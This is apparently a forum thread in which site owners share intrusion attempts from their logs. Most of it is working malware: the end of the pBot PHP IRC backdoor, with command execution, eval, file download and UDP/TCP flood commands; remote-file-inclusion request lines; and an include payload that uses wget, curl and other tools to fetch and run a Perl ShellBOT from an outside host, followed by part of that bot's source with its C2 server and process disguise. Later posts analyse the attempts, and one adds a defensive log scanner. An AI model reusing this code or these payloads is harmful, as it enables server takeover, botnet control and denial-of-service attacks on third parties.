$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == ""))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged in");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2auth\2]: Incorrect password from $nick");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{//RESTART case "restart": $this->send("QUIT :restart"); fclose($this->conn); $this->start(); break; //MAIL case "mail": //mail to from subject message if(count($mcmd)>4) { $header = "From: <".$mcmd[2].">"; if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) { $this->privmsg($this->config['chan'],"[\2mail\2]: Unable to send"); } else { $this->privmsg($this->config['chan'],"[\2mail\2]: Message sent to \2".$mcmd[1]."\2"); } } break; //DNS case "dns": if(isset($mcmd[1])) { $ip = explode(".",$mcmd[1]); if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); } else { $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); } } break; //INFO case "info": $this->privmsg($this->config['chan'],"[\2info\2]: [\2httpd\2: ".$_SERVER['SERVER_SOFTWARE']."] [\2docroot\2: ".$_SERVER['DOCUMENT_ROOT']."] [\2domain\2: ".$_SERVER['SERVER_NAME']."] [\2admin\2: ".$_SERVER['SERVER_ADMIN']."] [\2url\2:".$_SERVER['REQUEST_URI']."]"); break; //COMMAND case "cmd": if(isset($mcmd[1])) { $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $this->privmsg($this->config['chan'],"[\2cmd\2]: $command"); $pipe = popen($command,"r"); while(!feof($pipe)) { $pbuf = trim(fgets($pipe,512)); if($pbuf != NULL) $this->privmsg($this->config['chan']," : $pbuf"); } pclose($pipe); } break; // SET NICK BASED ON HTTPD SERVER TYPE case "rndnick": $this->set_nick(); break; //SEND A MSG,COMMAND case "raw": $this->send(strstr($msg,$mcmd[1])); break; // UHHH, THIS DOES *SOMETHING* case "php": $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); break; // EXECUTE A COMMAND FROM THE SHELL case "exec": $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); $exec = shell_exec($command); $ret = explode("\n",$exec); $this->privmsg($this->config['chan'],"[\2exec\2]: $command"); for($i=0;$i<count($ret);$i++) 
if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i])); break; // PORTSCAN SOME SHIT case "pscan": // .pscan 127.0.0.1 6667 if(count($mcmd) > 2) { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); else $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); } break; // CHANGE IRC SERVERS case "ud.server": // .udserver <server> <port> [password] if(count($mcmd)>2) { $this->config['server'] = $mcmd[1]; $this->config['port'] = $mcmd[2]; if(isset($mcmcd[3])) { $this->config['pass'] = $mcmd[3]; $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]." Pass: ".$mcmd[3]); } else { $this->privmsg($this->config['chan'],"[\2update\2]: Changed server to ".$mcmd[1].":".$mcmd[2]); } } break; // DOWNLOAD STUFF case "download": if(count($mcmd) > 2) { if(!$fp = fopen($mcmd[2],"w")) { $this->privmsg($this->config['chan'],"[\2download\2]: Cannot download, permission denied."); } else { if(!$get = file($mcmd[1])) { $this->privmsg($this->config['chan'],"[\2download\2]: Unable to download from \2".$mcmd[1]."\2"); } else { for($i=0;$i<=count($get);$i++) { fwrite($fp,$get[$i]); } $this->privmsg($this->config['chan'],"[\2download\2]: File \2".$mcmd[1]."\2 downloaded to \2".$mcmd[2]."\2"); } fclose($fp); } } break; // QUIT case "die": $this->send("QUIT :die command from $nick"); fclose($this->conn); exit; case "logout": $this->log_out($host); $this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged out"); break; // FLOOD UDP case "udpflood": if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); } break; // FLOOD TCP case "tcpflood": if(count($mcmd)>5) { $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); } break; } } } break; } } } $old_buf = $this->buf; } $this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2udpflood\2]: Floodando $host durante $time segundos com pacotes de $packetsize bytes");// TRANSL: FLOOD HOST DURATION $time SECONDS WITH PACKETS OF $packetsize BYTES (portuguses again) $packet = ""; for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } $timei = time(); $i = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); fclose($fp); $i++; } $env = $i * $packetsize; $env = $env / 1048576; $vel = $env / $time; $vel = round($vel); $env = round($env); $this->privmsg($this->config['chan'],"[\2udpflood\2]: Flood concluido: $env MB enviados / Velocidade media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Sending $packets packets to $host:$port. Packet size: $packetsize");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2tcpflood\2]: Finished sending $packets packets to $host:$port.");
}
}// GO GO GADGET pBot!!!!
$bot = new pBot;
$bot->start();?>
NEW ATTACK, #2:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Guest : 213.139.211.68 : July 14, 2007, 08:06:28 PM
/forums/index.php?board=13;action=display;threadid=http%3A%2F%2Fwww.krippenverein.de%2Farchiv%2Fimages%2Finc%2F
This topic doesn't exist on this board. - "http://www.krippenverein.de/archiv/images/inc/"
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-ANOTHER, #3:
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
71.29.236.111 - - [02/Jul/2007:18:14:06 -0500] "GET //help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://dvl.by.ru/cmd/r57shell.txt? HTTP/1.1" 404 294
===== malcode:
<?php
//
/
/ # # # #
/ # # # #
/ # # # #
/ # ## #### ## #
/ ## ## ###### ## ##
/ ## ## ###### ## ##
/ ## ## #### ## ##
/ ### ############ ###
/ ########################
/ ##############
/ ######## ########## #######
/ ### ## ########## ## ###
/ ### ## ########## ## ###
/ ### # ########## # ###
/ ### ## ######## ## ###
/ ## # ###### # ##
/ ## # #### # ##
/ ## ##
/
/
/
/ r57shell.php - a PHP script that lets you execute system commands on the server through the browser
/ You can download the new version on our site: http://rst.void.ru
/ Version: 1.3 (05.03.2006)
/~~~~~~~~~~/
/Special thanks for help and ideas: blf, phoenix, virus, NorD and all the devils from RST/GHC.
/If you have any ideas about which functions should be added to the script, write
/to rst@void.ru. All suggestions will be considered.
//~~~~~~~~~~
/ (c)oded by 1dt.w0lf
/ RST/GHC http://rst.void.ru , http://ghc.ru
/ ANY MODIFIED REPUBLISHING IS RESTRICTED
/**********************************/
/ ~~~ Settings | Options ~~~ */include("http://dvl.by.ru/box.txt");
///INCLUDE FILE CONTAINS:
/* <?
echo('vulnerable');
shell_exec('cd /tmp;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;curl -O crewcorp.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;fetch http://dvl.by.ru/crewcorp.txt;crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /tmp;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;wget http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;curl -O box.txt http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;lwp-download http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;lynx -source http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;fetch http://dvl.by.ru/crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
shell_exec('cd /dev/shm;GET http://dvl.by.ru/crewcorp.txt >crewcorp.txt;perl crewcorp.txt;rm -rf crewcorp.txt');
?> */////MORE- "crewcorp.txt" CONTAINS:
/*#!/usr/bin/perl
ShellBOT by: devil__
Greetz: Puna, Kelserific
Commands:
@oldpack <ip> <bytes> <time>;
@udp <ip> <port> <time>;
@fullportscan <ip> <start port> <end port>;
@conback <ip> <port>
@download <url> <file to save as>;
!estatisticas <on/off>;
!sair to terminate the bot;
!novonick to change the bot's nick to a new random one;
!entra <channel> <time>
!sai <channel> <time>;
!pacotes <on/off>
@info
@xpl <kernel>
@sendmail <subject> <sender> <recipient> <content>
########## CONFIGURATION ############
my @ps = ("/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[bash]");
my $processo = $ps[rand scalar @ps];$servidor='priv8.crewcorp.net' unless $servidor;
my $porta='3121';
my @canais=("#crew");
my @adms=("devil__","kelserific","ITAL0","Puna","wicked");Anti Flood ( 6/3 Recommended )
my $linas_max=10;
my $sleep=3;my $nick = getnick();
my $ircname = getident2();
my $realname = "windows nt 5.1 build 2600";
#chop (my $realname =uname -n
);my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "!all";
my $estatisticas = 0;
my $pacotes = 1;
####################################my $VERSAO = '0.3b';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();#####################
Stealth Shellbot
#####################
sub getnick {
return "crew^".int(rand(1000));
}sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);my @chars=('a'..'z','A'..'Z','1'..'9'); foreach (1..$length) { $randomstring.=$chars[rand @chars]; } return $randomstring;
}
#############################
B0tchZ na veia ehehe :P
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $[0];
print $socket "$[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}sub conectar {
my $meunick = $[0];
my $servidor_con = $[1];
my $porta_con = $_[2];my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;$IRC_socket->autoflush(1); $sel_cliente->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"</PRE>
-
found this on the web
Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
/forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
Looks like he's trying an SMF exploit (he's doing it wrong, though), as Sources/Packages.php is an SMF file. Note that this will never work: accessing an SMF file like Sources/Packages.php directly won't work (it will just show a "hacking attempt..." message), and $sourcedir is always defined in Settings.php (which is always require()d).
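The three request shapes quoted in this thread (a plain URL as a parameter value, a percent-encoded URL in a `;`-separated forum query, and a URL nested after a second `?name=` inside one value) can all be flagged from an access log. The following is an added example, not code from any poster; the log lines, hosts and IPs are constructed placeholders, and `trusted_hosts` is a hypothetical tuning parameter for legitimate redirect targets.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample lines in Apache combined-log shape (placeholder hosts/IPs).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Jul/2007:18:14:06 -0500] "GET /page.php?cmd=dir&BASE_DIR=http://attacker.example/shell.txt? HTTP/1.1" 404 294',
    '192.0.2.11 - - [14/Jul/2007:20:06:28 -0500] "GET /forums/index.php?board=13;action=display;threadid=http%3A%2F%2Fattacker.example%2Finc%2F HTTP/1.1" 200 5120',
    '192.0.2.12 - - [12/Jul/2007:05:40:08 -0500] "GET /forums/index.php?board=15;threadid=2286/Sources/Packages.php?sourcedir=http://attacker.example/asd.txt??? HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Jul/2007:05:41:00 -0500] "GET /forums/index.php?board=15;action=display;threadid=2286 HTTP/1.1" 200 7311',
    '198.51.100.8 - - [12/Jul/2007:05:42:00 -0500] "GET /login.php?next=https://www.example.com/account HTTP/1.1" 302 0',
]

# Client IP, request target and status code of one log entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# A remote URL at the start of a value, or nested after another "name=".
REMOTE_RE = re.compile(r"(?:^|=)((?:https?|ftp)://[^\s\"'<>]+)", re.IGNORECASE)


def remote_url_params(target, trusted_hosts=frozenset()):
    """Return [(param, url)] for query parameters whose value carries a remote URL."""
    _, _, query = target.partition("?")
    hits = []
    # Split before decoding so an encoded '&' or ';' cannot forge a boundary.
    for pair in re.split(r"[&;]", query):
        name, _, raw = pair.partition("=")
        match = REMOTE_RE.search(unquote(raw))
        if not name or not match:
            continue
        # Trailing '?' is padding used to swallow whatever the script appends.
        url = match.group(1).rstrip("?")
        if urlparse(url).hostname not in trusted_hosts:
            hits.append((name, url))
    return hits


def scan(lines, trusted_hosts=frozenset()):
    """Return one record per suspicious parameter found in the log lines."""
    records = []
    for line in lines:
        entry = REQUEST_RE.match(line)
        if not entry:
            continue
        ip, target, status = entry.groups()
        for name, url in remote_url_params(target, trusted_hosts):
            records.append({"ip": ip, "status": int(status), "param": name, "url": url})
    return records


if __name__ == "__main__":
    for record in scan(SAMPLE_LOG, trusted_hosts={"www.example.com"}):
        print(record)
```

A 200 status on a flagged request only means the page rendered; whether the include actually ran has to be checked on the server side, for example by looking for outbound fetches to the flagged host.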
-
I know no pages should do that, but maybe it was someone who was just trying to test the security of your web-site. I get wrong requests on my web-site sometimes as well, and as long as it doesn't breach my security it is OK; now you can see whether or not it is really secure, and if it isn't secure, fix it. I sometimes get weirder requests than this on my web-site. (Of course, if I would test the security in this way, which I don't do unless I see something that looks like it could easily be exploited, I would instead add a message somewhere that says it is insecure and asks if the owner of this site can please correct it soon. If it is insecure I would notify the owner! Usually it is secure though, and that is good.)